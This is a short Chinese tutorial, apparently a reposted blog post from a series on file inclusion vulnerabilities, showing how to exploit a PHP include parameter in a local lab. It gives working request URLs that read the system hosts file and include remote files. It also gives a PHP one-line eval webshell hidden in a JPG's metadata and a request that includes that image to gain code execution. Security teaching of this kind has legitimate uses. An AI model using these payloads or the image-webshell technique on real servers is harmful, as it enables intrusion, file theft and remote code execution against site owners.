文件包含漏洞的利用
讀取敏感文件
我們可以利用文件包含漏洞讀取任意文件,讀取文件的時候有利用條件
目標(biāo)主機文件存在(目標(biāo)文件的路徑、絕對路徑、相對路徑)
具有文件可讀權(quán)限
提交參數(shù)http://localhost/include/include.php?path=C:\windows\system32\drivers\etc\hosts,讀取本地host文件

提交參數(shù)http://localhost/include/include.php?path=http://www.cac.gov.cn/2021-01/22/c_1612887880656609.htm,讀取遠(yuǎn)程文件,加載遠(yuǎn)程服務(wù)器上的文件
直接包含圖片木馬
可以利用文件包含漏洞直接包含圖片木馬
在include文件夾下新建wx.jpg圖片文件

點擊文件右鍵選擇屬性,點擊版型信息,選擇版權(quán),輸入一句話木馬文章來源:http://www.zghlxwxcb.cn/news/detail-501890.html
<?php @eval($_REQUEST[123]);?>

打開瀏覽器輸入http://localhost/include/include.php?path=./wx.jpg,進行訪問文章來源地址http://www.zghlxwxcb.cn/news/detail-501890.html
到了這里,關(guān)于【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!